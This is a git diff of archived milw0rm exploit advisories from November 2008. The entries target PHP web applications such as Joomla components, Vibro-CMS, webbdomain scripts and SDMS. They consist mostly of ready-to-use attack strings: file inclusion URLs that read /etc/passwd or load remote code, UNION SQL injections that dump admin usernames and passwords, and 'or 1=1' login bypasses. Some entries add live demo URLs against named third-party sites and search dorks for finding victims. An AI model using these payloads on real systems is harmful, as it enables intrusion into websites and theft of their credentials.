+================================================================================================================================ + + + [o] Vulnerable file + + administrator/components/com_googlebase/admin.googlebase.php + + include( $mosConfig_absolute_path.'/administrator/components/com_virtuemart/virtuemart.cfg.php' ); + + + + [o] Exploit + + http://localhost/[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=[evilcode] + + +================================================================================================================================ + + + [o] Greetz + + MainHack BrotherHood [ http://serverisdown.org/blog/] + Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa + H312Y yooogy mousekill }^-^{ kaka11 martfella + skulmatic olibekas ulga Cungkee k1tk4t str0ke + + +================================================================================================================================ + +# milw0rm.com [2008-11-04] diff --git a/platforms/php/webapps/6976.txt b/platforms/php/webapps/6976.txt index 46214d4fa..03e72e665 100755 --- a/platforms/php/webapps/6976.txt +++ b/platforms/php/webapps/6976.txt 
@@ -1,44 +1,44 @@ -======================================================================================================================================= - - - [o] com_ongumatimesheet20 4 Beta Remote File Inclusion Vulnerability - - Software : com_ongumatimesheet20 version 4 Beta - Download : http://joomlacode.org/gf/project/ongumasa/frs/ - Author : NoGe - Contact : noge[dot]code[at]gmail[dot]com - Blog : http://evilc0de.blogspot.com [promosi :p] - - -======================================================================================================================================= - - - [o] Vulnerable file - - administrator/components/com_ongumatimesheet20/lib/onguma.class.php - - include_once($mosConfig_absolute_path.'/includes/patTemplate/patError.php'); - include_once($mosConfig_absolute_path.'/includes/patTemplate/patErrorManager.php'); - include_once($mosConfig_absolute_path.'/includes/patTemplate/patTemplate.php'); - - - - [o] Exploit - - http://localhost/[path]/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=[evilcode] - - -======================================================================================================================================= - - - [o] Greetz - - MainHack BrotherHood [ http://serverisdown.org/blog/] - Vrs-hCk OoN_BoY Paman - H312Y yooogy mousekill }^-^{ kaka11 martfella - skulmatic olibekas ulga Cungkee k1tk4t str0ke - - -======================================================================================================================================= - -# milw0rm.com [2008-11-04] +======================================================================================================================================= + + + [o] com_ongumatimesheet20 4 Beta Remote File Inclusion Vulnerability + + Software : com_ongumatimesheet20 version 4 Beta + Download : http://joomlacode.org/gf/project/ongumasa/frs/ + Author : NoGe + Contact : noge[dot]code[at]gmail[dot]com + Blog : 
http://evilc0de.blogspot.com [promosi :p] + + +======================================================================================================================================= + + + [o] Vulnerable file + + administrator/components/com_ongumatimesheet20/lib/onguma.class.php + + include_once($mosConfig_absolute_path.'/includes/patTemplate/patError.php'); + include_once($mosConfig_absolute_path.'/includes/patTemplate/patErrorManager.php'); + include_once($mosConfig_absolute_path.'/includes/patTemplate/patTemplate.php'); + + + + [o] Exploit + + http://localhost/[path]/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=[evilcode] + + +======================================================================================================================================= + + + [o] Greetz + + MainHack BrotherHood [ http://serverisdown.org/blog/] + Vrs-hCk OoN_BoY Paman + H312Y yooogy mousekill }^-^{ kaka11 martfella + skulmatic olibekas ulga Cungkee k1tk4t str0ke + + +======================================================================================================================================= + +# milw0rm.com [2008-11-04] diff --git a/platforms/php/webapps/6977.txt b/platforms/php/webapps/6977.txt index acd786332..14e5a324e 100755 --- a/platforms/php/webapps/6977.txt +++ b/platforms/php/webapps/6977.txt 
@@ -1,44 +1,44 @@ -post Card ( catid ) Remote SQL Injection Vulnerability -___________________________________ - -Author: Hussin X - -Home : www.IQ-TY.com & www.TrYaG.cc - -MaiL : darkangeL_G85@Yahoo.CoM -___________________________________ - -script : http://webbdomain.com/php/postcarden/index2.php -script : http://webbdomain.com/php/postcardir/index2.php - -DorK : inurl:choosecard.php?catid= -_____ - -ExploiT & Demo -_______ - -post Card v 1.01 - -http://webbdomain.com/php/postcarden/choosecard.php?catid=-1002+union+select+concat(username,0x3a,password),2,3+from+admin-- - - -post Card v 1.02 -http://webbdomain.com/php/postcardir/choosecard.php?catid=-1002+union+select+concat(username,0x3a,password),2,3+from+admin-- - - -Note : Exploit in Properties Picture - - -Login : -______ -/admin - - - - -Greetz : All my freind - - - Im IraQi | Im TrYaGi - -# milw0rm.com [2008-11-04] +post Card ( catid ) Remote SQL Injection Vulnerability +___________________________________ + +Author: Hussin X + +Home : www.IQ-TY.com & www.TrYaG.cc + +MaiL : darkangeL_G85@Yahoo.CoM +___________________________________ + +script : http://webbdomain.com/php/postcarden/index2.php +script : http://webbdomain.com/php/postcardir/index2.php + +DorK : inurl:choosecard.php?catid= +_____ + +ExploiT & Demo +_______ + +post Card v 1.01 + +http://webbdomain.com/php/postcarden/choosecard.php?catid=-1002+union+select+concat(username,0x3a,password),2,3+from+admin-- + + +post Card v 1.02 +http://webbdomain.com/php/postcardir/choosecard.php?catid=-1002+union+select+concat(username,0x3a,password),2,3+from+admin-- + + +Note : Exploit in Properties Picture + + +Login : +______ +/admin + + + + +Greetz : All my freind + + + Im IraQi | Im TrYaGi + +# milw0rm.com [2008-11-04] diff --git a/platforms/php/webapps/6978.txt b/platforms/php/webapps/6978.txt index 0cd1f6566..e79808b91 100755 --- a/platforms/php/webapps/6978.txt +++ b/platforms/php/webapps/6978.txt 
@@ -1,26 +1,26 @@ -/* - ------------------------------------------------------- - Vibro-CMS Multiple Remote SQL Injection Vulnerabilities - ------------------------------------------------------- - Discovered By StAkeR[at]hotmail[dot]it - http://www.niclor.net/prodotti/Vibro-CMS - ------------------------------------------------------- - - * Remote SQL Injection - * Note: Works Regardless PHP.ini Settings - - - view_pagina.php?pId=1 union select null,concat_ws(0x3a,user(),version(),database()),null/* - - view_sub-pagina.php?pId=1 union select 0,concat(database(),0x3a,user()),version(),3/* - - view_news.php?nID=4 union select 0,0,user(),1,2,3,4,database(),6,7,8,version(),0/* - - * Demo - - - http://www.niclor.net/prodotti/Vibro-CMS/view_pagina.php?pId=1 union select 0,concat_ws(0x3a,user(),version(),database()),0/* - - http://www.niclor.net/prodotti/Vibro-CMS/ view_sub-pagina.php?pId=1 union select 0,concat(database(),0x3a,user()),version(),3/* - - http://www.niclor.net/prodotti/Vibro-CMS/view_news.php?nID=4 union select 0,0,user(),1,2,3,4,database(),6,7,8,version(),0/* - - - -*/ - -# milw0rm.com [2008-11-04] +/* + ------------------------------------------------------- + Vibro-CMS Multiple Remote SQL Injection Vulnerabilities + ------------------------------------------------------- + Discovered By StAkeR[at]hotmail[dot]it + http://www.niclor.net/prodotti/Vibro-CMS + ------------------------------------------------------- + + * Remote SQL Injection + * Note: Works Regardless PHP.ini Settings + + - view_pagina.php?pId=1 union select null,concat_ws(0x3a,user(),version(),database()),null/* + - view_sub-pagina.php?pId=1 union select 0,concat(database(),0x3a,user()),version(),3/* + - view_news.php?nID=4 union select 0,0,user(),1,2,3,4,database(),6,7,8,version(),0/* + + * Demo + + - http://www.niclor.net/prodotti/Vibro-CMS/view_pagina.php?pId=1 union select 0,concat_ws(0x3a,user(),version(),database()),0/* + - http://www.niclor.net/prodotti/Vibro-CMS/ 
view_sub-pagina.php?pId=1 union select 0,concat(database(),0x3a,user()),version(),3/* + - http://www.niclor.net/prodotti/Vibro-CMS/view_news.php?nID=4 union select 0,0,user(),1,2,3,4,database(),6,7,8,version(),0/* + + + +*/ + +# milw0rm.com [2008-11-04] diff --git a/platforms/php/webapps/6979.txt b/platforms/php/webapps/6979.txt index c46db3da2..60c0666d1 100755 --- a/platforms/php/webapps/6979.txt +++ b/platforms/php/webapps/6979.txt @@ -1,22 +1,22 @@ -/* - --------------------------------------------------- - Puglia_Landscape Local File Inclusion Vulnerability - --------------------------------------------------- - Discovered By StAkeR[at]hotmail[dot]it - http://www.niclor.net/prodotti/Puglia_Landscape - --------------------------------------------------- - - * Local File Inclusion - * Note: Magic_Quotes_GPC Off - - - index.php?id=../../../../../../../[Local File and NullByte] - - index.php?id=../../../../../../../etc/passwd%00 - - * Demo - - http://www.niclor.net/prodotti/Puglia_Landscape/index.php?id=../../../../../../../etc/passwd%00 - - - -*/ - -# milw0rm.com [2008-11-04] +/* + --------------------------------------------------- + Puglia_Landscape Local File Inclusion Vulnerability + --------------------------------------------------- + Discovered By StAkeR[at]hotmail[dot]it + http://www.niclor.net/prodotti/Puglia_Landscape + --------------------------------------------------- + + * Local File Inclusion + * Note: Magic_Quotes_GPC Off + + - index.php?id=../../../../../../../[Local File and NullByte] + - index.php?id=../../../../../../../etc/passwd%00 + + * Demo + - http://www.niclor.net/prodotti/Puglia_Landscape/index.php?id=../../../../../../../etc/passwd%00 + + + +*/ + +# milw0rm.com [2008-11-04] diff --git a/platforms/php/webapps/6980.txt b/platforms/php/webapps/6980.txt index 594786b7e..dcc3dce37 100755 --- a/platforms/php/webapps/6980.txt +++ b/platforms/php/webapps/6980.txt 
@@ -1,36 +1,36 @@ -[~]------------------------------------------------------------------------------------------------------- -[~] Joomla Component ProDesk v 1.0 AND 1.2 (com_pro_desk&include_file) Local File Inclusion Vulnerability -[~] -[~] http://joomlashowroom.com/index.php/Pro-Desk-Support-Center/Pro-Desk-Support-Center.html -[~] -[~] -[~] ---------------------------------------------------------------------------------------------------- -[~] Bug founded by d3v1l [Avram Marius] -[~] -[~] Date: 4.11.2008 -[~] -[~] -[~] d3v1l@spoofer.com http://security-sh3ll.com -[~] -[~] ----------------------------------------------------------------------------------------------------- -[~] Greetz tO ALL:- -[~] -[~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) -[~] -[~] milw0rm staff -[~]------------------------------------------------------------------------------------------------------ -[~] Exploit :- -[~] -[~] http://site.com/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd -[~] -[~] Ex :- v 1.2 -[~] -[~] http://www.reviewyou.com.au/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd -[~]------------------------------------------------------------------------------------------------------- -[~] -[~] Ex :- v1.0 -[~] -[~] http://www.ppcmanagement.com/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd -[~]--------------------------------------------------------------------------------------------------------- - -# milw0rm.com [2008-11-04] +[~]------------------------------------------------------------------------------------------------------- +[~] Joomla Component ProDesk v 1.0 AND 1.2 (com_pro_desk&include_file) Local File Inclusion Vulnerability +[~] +[~] http://joomlashowroom.com/index.php/Pro-Desk-Support-Center/Pro-Desk-Support-Center.html +[~] +[~] +[~] ---------------------------------------------------------------------------------------------------- +[~] Bug founded by d3v1l [Avram 
Marius] +[~] +[~] Date: 4.11.2008 +[~] +[~] +[~] d3v1l@spoofer.com http://security-sh3ll.com +[~] +[~] ----------------------------------------------------------------------------------------------------- +[~] Greetz tO ALL:- +[~] +[~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) +[~] +[~] milw0rm staff +[~]------------------------------------------------------------------------------------------------------ +[~] Exploit :- +[~] +[~] http://site.com/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd +[~] +[~] Ex :- v 1.2 +[~] +[~] http://www.reviewyou.com.au/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd +[~]------------------------------------------------------------------------------------------------------- +[~] +[~] Ex :- v1.0 +[~] +[~] http://www.ppcmanagement.com/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd +[~]--------------------------------------------------------------------------------------------------------- + +# milw0rm.com [2008-11-04] diff --git a/platforms/php/webapps/6981.txt b/platforms/php/webapps/6981.txt index 5bcae25a2..ec7b9423e 100755 --- a/platforms/php/webapps/6981.txt +++ b/platforms/php/webapps/6981.txt 
@@ -1,56 +1,56 @@ -********************************************************************************************* -[!] [!] -[!] OOOO O OOOOOOOOO [!] -[!]O O O O O [!] -[!]O O O [!] -[!]O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!] -[!]O OOO OOO O O O O OO O O O O OO O O O [!] -[!]O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!] -[!]O O OOOO O O O O O O O O O O O [!] -[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!] -[!] OO [!] -[!] OO [!] -[!] OO Proud To Be MoroCCaN [!] -[!] OO [!] -********************************************************************************************* -Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR ---------------------------------------------------------------------------------------------- -= Vibro-School CMS (nID) Remote SQL injection Vulnerability = ---------------------------------------------------------------------------------------------- - ---------------------------------------------------------------------------------------------- --===========================================================================================- --= SQL InjEction By : Cyber-Zone =- --= =- --= E-mail : paradis_des_fous@hotmail.fr =- --= =- --= Home : WwW.IQ-Ty.CoM =- --===========================================================================================- ---------------------------------------------------------------------------------------------- - -Download : http://www.niclor.net/prodotti/Vibro-School-CMS - - -dork : Vibro-School CMS by nicLOR.net - -Exploit : http://localhost/Vibro-School-CMS/view_news.php?nID=-3+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13-- - - -live demo : - - -http://www.niclor.net/prodotti/Vibro-School-CMS/view_news.php?nID=-3+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13-- - ---------------------------------------------------------------------------------------------- --======================================= ThanX To 
==========================================- --= Hussin X , CraCkEr , Force-Major , WaLid , GeneraL-Oujda , Oujda-Lord =- --= =- --= WwW.IQ-ty.Com , No-Exploit (JIKO) =- --= =- --= Oujda SeCurity TeaM =- --===========================================================================================- ---------------------------------------------------------------------------------------------- - -Spicial ThanX To My Friend StaCk & All KazaWa Boys :) - -# milw0rm.com [2008-11-04] +********************************************************************************************* +[!] [!] +[!] OOOO O OOOOOOOOO [!] +[!]O O O O O [!] +[!]O O O [!] +[!]O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!] +[!]O OOO OOO O O O O OO O O O O OO O O O [!] +[!]O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!] +[!]O O OOOO O O O O O O O O O O O [!] +[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!] +[!] OO [!] +[!] OO [!] +[!] OO Proud To Be MoroCCaN [!] +[!] OO [!] +********************************************************************************************* +Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR +--------------------------------------------------------------------------------------------- += Vibro-School CMS (nID) Remote SQL injection Vulnerability = +--------------------------------------------------------------------------------------------- + +--------------------------------------------------------------------------------------------- +-===========================================================================================- +-= SQL InjEction By : Cyber-Zone =- +-= =- +-= E-mail : paradis_des_fous@hotmail.fr =- +-= =- +-= Home : WwW.IQ-Ty.CoM =- +-===========================================================================================- +--------------------------------------------------------------------------------------------- + +Download : http://www.niclor.net/prodotti/Vibro-School-CMS + + +dork : 
Vibro-School CMS by nicLOR.net + +Exploit : http://localhost/Vibro-School-CMS/view_news.php?nID=-3+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13-- + + +live demo : + + +http://www.niclor.net/prodotti/Vibro-School-CMS/view_news.php?nID=-3+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13-- + +--------------------------------------------------------------------------------------------- +-======================================= ThanX To ==========================================- +-= Hussin X , CraCkEr , Force-Major , WaLid , GeneraL-Oujda , Oujda-Lord =- +-= =- +-= WwW.IQ-ty.Com , No-Exploit (JIKO) =- +-= =- +-= Oujda SeCurity TeaM =- +-===========================================================================================- +--------------------------------------------------------------------------------------------- + +Spicial ThanX To My Friend StaCk & All KazaWa Boys :) + +# milw0rm.com [2008-11-04] diff --git a/platforms/php/webapps/6982.txt b/platforms/php/webapps/6982.txt index 74450178e..c502edbab 100755 --- a/platforms/php/webapps/6982.txt +++ b/platforms/php/webapps/6982.txt 
@@ -1,55 +1,55 @@ -********************************************************************************************* -[!] [!] -[!] OOOO O OOOOOOOOO [!] -[!]O O O O O [!] -[!]O O O [!] -[!]O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!] -[!]O OOO OOO O O O O OO O O O O OO O O O [!] -[!]O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!] -[!]O O OOOO O O O O O O O O O O O [!] -[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!] -[!] OO [!] -[!] OO [!] -[!] OO Proud To Be MoroCCaN [!] -[!] OO [!] -********************************************************************************************* -Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR ---------------------------------------------------------------------------------------------- -= CMS-School 2005 (showarticle.php) Remote SQL injection Vulnerability = ---------------------------------------------------------------------------------------------- - ---------------------------------------------------------------------------------------------- --===========================================================================================- --= SQL InjEction By : Cyber-Zone =- --= =- --= E-mail : paradis_des_fous@hotmail.fr =- --= =- --= Home : WwW.IQ-Ty.CoM =- --===========================================================================================- ---------------------------------------------------------------------------------------------- - -Download : http://www.niclor.net/prodotti/cms_school/ - - - -Exploit : http://localhost/cms_school/showarticle.php?aID=-4+union+select+version(),2,3-- - - -live demo : - - -http://www.niclor.net/prodotti/cms_school/showarticle.php?aID=-4+union+select+version(),2,3-- - ---------------------------------------------------------------------------------------------- --======================================= ThanX To ==========================================- --= Hussin X , CraCkEr , Force-Major , WaLid , GeneraL-Oujda , Oujda-Lord 
=- --= =- --= WwW.IQ-ty.Com , No-Exploit (JIKO) =- --= =- --= Oujda SeCurity TeaM =- --===========================================================================================- ---------------------------------------------------------------------------------------------- - -Spicial ThanX To My Friend StaCk & All KazaWa Boys :) - -# milw0rm.com [2008-11-04] +********************************************************************************************* +[!] [!] +[!] OOOO O OOOOOOOOO [!] +[!]O O O O O [!] +[!]O O O [!] +[!]O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!] +[!]O OOO OOO O O O O OO O O O O OO O O O [!] +[!]O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!] +[!]O O OOOO O O O O O O O O O O O [!] +[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!] +[!] OO [!] +[!] OO [!] +[!] OO Proud To Be MoroCCaN [!] +[!] OO [!] +********************************************************************************************* +Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR +--------------------------------------------------------------------------------------------- += CMS-School 2005 (showarticle.php) Remote SQL injection Vulnerability = +--------------------------------------------------------------------------------------------- + +--------------------------------------------------------------------------------------------- +-===========================================================================================- +-= SQL InjEction By : Cyber-Zone =- +-= =- +-= E-mail : paradis_des_fous@hotmail.fr =- +-= =- +-= Home : WwW.IQ-Ty.CoM =- +-===========================================================================================- +--------------------------------------------------------------------------------------------- + +Download : http://www.niclor.net/prodotti/cms_school/ + + + +Exploit : http://localhost/cms_school/showarticle.php?aID=-4+union+select+version(),2,3-- + + +live demo : + + 
+http://www.niclor.net/prodotti/cms_school/showarticle.php?aID=-4+union+select+version(),2,3-- + +--------------------------------------------------------------------------------------------- +-======================================= ThanX To ==========================================- +-= Hussin X , CraCkEr , Force-Major , WaLid , GeneraL-Oujda , Oujda-Lord =- +-= =- +-= WwW.IQ-ty.Com , No-Exploit (JIKO) =- +-= =- +-= Oujda SeCurity TeaM =- +-===========================================================================================- +--------------------------------------------------------------------------------------------- + +Spicial ThanX To My Friend StaCk & All KazaWa Boys :) + +# milw0rm.com [2008-11-04] diff --git a/platforms/php/webapps/6983.txt b/platforms/php/webapps/6983.txt index 3a4cbfd72..363322c4d 100755 --- a/platforms/php/webapps/6983.txt +++ b/platforms/php/webapps/6983.txt 
@@ -1,27 +1,27 @@ -########################################################################### - ______ __ __ ______ __ ______ - / ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___ - / __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \ - / /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / / - /_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/ - /____/ EgY Coders Vulnerability Research TM - -# [~] Discovered by : Hakxer -# [~] Type Gap : WEBBDOMAIN Petition Auth Bypass -# [~] Script :http://webbdomain.com/php/petition/petition.php -# [~] Greetz : Allah -########################################################################## - -|| Auth Bypass || - -http://webbdomain.com/php/petition/admin/ - -Username : admin ' or ' 1=1 -password : Hakxer - -Logged In ... - -# Proud To be a Muslim # -#_=END=_# - -# milw0rm.com [2008-11-04] +########################################################################### + ______ __ __ ______ __ ______ + / ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___ + / __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \ + / /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / / + /_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/ + /____/ EgY Coders Vulnerability Research TM + +# [~] Discovered by : Hakxer +# [~] Type Gap : WEBBDOMAIN Petition Auth Bypass +# [~] Script :http://webbdomain.com/php/petition/petition.php +# [~] Greetz : Allah +########################################################################## + +|| Auth Bypass || + +http://webbdomain.com/php/petition/admin/ + +Username : admin ' or ' 1=1 +password : Hakxer + +Logged In ... + +# Proud To be a Muslim # +#_=END=_# + +# milw0rm.com [2008-11-04] diff --git a/platforms/php/webapps/6984.txt b/platforms/php/webapps/6984.txt index 77a1bf144..d6db6f945 100755 --- a/platforms/php/webapps/6984.txt 
+++ b/platforms/php/webapps/6984.txt @@ -1,27 +1,27 @@ -########################################################################### - ______ __ __ ______ __ ______ - / ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___ - / __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \ - / /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / / - /_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/ - /____/ EgY Coders Vulnerability Research TM - -# [~] Discovered by : Hakxer -# [~] Type Gap : WEBBDOMAIN Poll Auth Bypass -# [~] Script :http://webbdomain.com/php/poll/poll.php -# [~] Greetz : Allah -########################################################################## - -|| Auth Bypass || - -http://webbdomain.com/php/poll/admin - -Username : admin ' or ' 1=1 -password : Hakxer - -Logged In ... - -# Proud To be a Muslim # -#_=END=_# - -# milw0rm.com [2008-11-04] +########################################################################### + ______ __ __ ______ __ ______ + / ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___ + / __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \ + / /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / / + /_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/ + /____/ EgY Coders Vulnerability Research TM + +# [~] Discovered by : Hakxer +# [~] Type Gap : WEBBDOMAIN Poll Auth Bypass +# [~] Script :http://webbdomain.com/php/poll/poll.php +# [~] Greetz : Allah +########################################################################## + +|| Auth Bypass || + +http://webbdomain.com/php/poll/admin + +Username : admin ' or ' 1=1 +password : Hakxer + +Logged In ... + +# Proud To be a Muslim # +#_=END=_# + +# milw0rm.com [2008-11-04] diff --git a/platforms/php/webapps/6985.txt b/platforms/php/webapps/6985.txt index ff09d932c..de61c1c3a 100755 --- a/platforms/php/webapps/6985.txt 
+++ b/platforms/php/webapps/6985.txt @@ -1,27 +1,27 @@ -########################################################################### - ______ __ __ ______ __ ______ - / ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___ - / __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \ - / /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / / - /_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/ - /____/ EgY Coders Vulnerability Research TM - -# [~] Discovered by : Hakxer -# [~] Type Gap : WEBBDOMAIN Quiz Auth Bypass -# [~] Script :http://webbdomain.com/php/quizen/ -# [~] Greetz : Allah -########################################################################## - -|| Auth Bypass || - -http://webbdomain.com/php/quizen/admin/ - -Username : admin ' or ' 1=1 -password : Hakxer - -Logged In ... - -# Proud To be a Muslim # -#_=END=_# - -# milw0rm.com [2008-11-04] +########################################################################### + ______ __ __ ______ __ ______ + / ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___ + / __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \ + / /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / / + /_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/ + /____/ EgY Coders Vulnerability Research TM + +# [~] Discovered by : Hakxer +# [~] Type Gap : WEBBDOMAIN Quiz Auth Bypass +# [~] Script :http://webbdomain.com/php/quizen/ +# [~] Greetz : Allah +########################################################################## + +|| Auth Bypass || + +http://webbdomain.com/php/quizen/admin/ + +Username : admin ' or ' 1=1 +password : Hakxer + +Logged In ... + +# Proud To be a Muslim # +#_=END=_# + +# milw0rm.com [2008-11-04] diff --git a/platforms/php/webapps/6986.txt b/platforms/php/webapps/6986.txt index fd7d20c25..c5a9589e9 100755 --- a/platforms/php/webapps/6986.txt 
+++ b/platforms/php/webapps/6986.txt 
@@ -1,28 +1,28 @@ -########################################################################### - ______ __ __ ______ __ ______ - / ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___ - / __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \ - / /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / / - /_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/ - /____/ EgY Coders Vulnerability Research TM - -# [~] Discovered by : Hakxer -# [~] Type Gap : WEBBDOMAIN Webshop Auth Bypass All Version -# [~] Script :http://webbdomain.com/php/webshopir/~~All Version ~~ -# [~] Greetz : Allah -########################################################################## - -|| Auth Bypass || - -http://webbdomain.com/php/webshopir/admin V1.2 -http://webbdomain.com/php/webshop/admin V 1.1 - -Username : admin ' or ' 1=1 -password : Hakxer - -Logged In ... - -# Proud To be a Muslim # -#_=END=_# - -# milw0rm.com [2008-11-04] +########################################################################### + ______ __ __ ______ __ ______ + / ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___ + / __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \ + / /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / / + /_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/ + /____/ EgY Coders Vulnerability Research TM + +# [~] Discovered by : Hakxer +# [~] Type Gap : WEBBDOMAIN Webshop Auth Bypass All Version +# [~] Script :http://webbdomain.com/php/webshopir/~~All Version ~~ +# [~] Greetz : Allah +########################################################################## + +|| Auth Bypass || + +http://webbdomain.com/php/webshopir/admin V1.2 +http://webbdomain.com/php/webshop/admin V 1.1 + +Username : admin ' or ' 1=1 +password : Hakxer + +Logged In ... + +# Proud To be a Muslim # +#_=END=_# + +# milw0rm.com [2008-11-04] 
diff --git a/platforms/php/webapps/6987.txt b/platforms/php/webapps/6987.txt
index 64c727d14..962067131 100755
--- a/platforms/php/webapps/6987.txt
+++ b/platforms/php/webapps/6987.txt
@@ -1,52 +1,52 @@ -SDMS Simple Document Management System v1.1.4 SQL Injection -___________________________________________________________________________ - - Author: Yuri - - - Program: SDMS Simple Document Management System - Version: v1.1.4 (and probably all older versions as well) - Website: http://sdms.cafuego.net/ - - -How it works -___________________________________________________________________________ -The login system is very insecure, this is the code we are going to abuse: - - $result = @mysql_query("SELECT pass != PASSWORD('$pass') FROM users WHERE user='$login'"); - - $row = @mysql_fetch_array($result); - - if( $row[0] != 0 ) { - - header("Location: index.php"); - - exit; - - } - - $result = @mysql_query("SELECT id,name FROM users WHERE user='$login'"); - $row = @mysql_fetch_array($result); - - $id = $row[id]; - - $name = $row[name]; - -If the result of the first query is 0, it selects the id and name from the -user entered at the login page. There is no filter on $pass. - -So if we enter - user: Admin (case insensitive) - password: ') FROM users WHERE id=-1 UNION SELECT 0 FROM users -- - -The resulting query looks like this: - - SELECT pass != PASSWORD('') FROM users WHERE id=-1 UNION SELECT 0 FROM users --') FROM users WHERE user='$login' - -which is always 0, so voila, admin access. 
- -___________________________________________________________________________ - - Yuri // 04 - 11 - 2008 - -# milw0rm.com [2008-11-04] +SDMS Simple Document Management System v1.1.4 SQL Injection +___________________________________________________________________________ + + Author: Yuri + + + Program: SDMS Simple Document Management System + Version: v1.1.4 (and probably all older versions as well) + Website: http://sdms.cafuego.net/ + + +How it works +___________________________________________________________________________ +The login system is very insecure, this is the code we are going to abuse: + + $result = @mysql_query("SELECT pass != PASSWORD('$pass') FROM users WHERE user='$login'"); + + $row = @mysql_fetch_array($result); + + if( $row[0] != 0 ) { + + header("Location: index.php"); + + exit; + + } + + $result = @mysql_query("SELECT id,name FROM users WHERE user='$login'"); + $row = @mysql_fetch_array($result); + + $id = $row[id]; + + $name = $row[name]; + +If the result of the first query is 0, it selects the id and name from the +user entered at the login page. There is no filter on $pass. + +So if we enter + user: Admin (case insensitive) + password: ') FROM users WHERE id=-1 UNION SELECT 0 FROM users -- + +The resulting query looks like this: + + SELECT pass != PASSWORD('') FROM users WHERE id=-1 UNION SELECT 0 FROM users --') FROM users WHERE user='$login' + +which is always 0, so voila, admin access. + 